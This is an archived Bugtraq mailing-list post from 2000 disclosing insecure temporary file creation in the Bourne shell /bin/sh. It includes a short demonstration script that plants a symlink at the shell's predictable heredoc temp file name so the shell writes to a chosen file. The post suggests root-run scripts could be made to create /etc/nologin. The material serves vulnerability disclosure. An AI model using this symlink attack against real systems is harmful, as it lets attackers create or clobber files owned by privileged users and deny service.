[17752] in bugtraq
/bin/sh creates insecure tmp files
daemon@ATHENA.MIT.EDU (Paul Szabo)
Thu Nov 23 18:26:02 2000
Message-ID: <200011230225.NAA19716@milan.maths.usyd.edu.au>
Date: Thu, 23 Nov 2000 13:25:28 +1100
Reply-To: Paul Szabo <psz@MATHS.USYD.EDU.AU>
From: Paul Szabo <psz@MATHS.USYD.EDU.AU>
To: BUGTRAQ@SECURITYFOCUS.COM
Similarly to the recently discussed tcsh vulnerability, the Bourne shell
/bin/sh also creates temporary files in an insecure way, and can be
exploited to create arbitrary files or to overwrite existing ones. While
this vulnerability can be exploited for a denial-of-service attack, it is
not clear how to use it to gain additional privileges.
I have confirmed this vulnerability in two (recent-version) commercial
UNIXes.
Demonstration:
#!/bin/sh -x
ls -l /tmp/nologin
ln -s /tmp/nologin /tmp/sh$$0
cat <<EOF
Only root can create /etc/nologin.
Do any boot-time scripts use sh?
EOF
ls -l /tmp/nologin
Paul Szabo - psz@maths.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics University of Sydney 2006 Australia
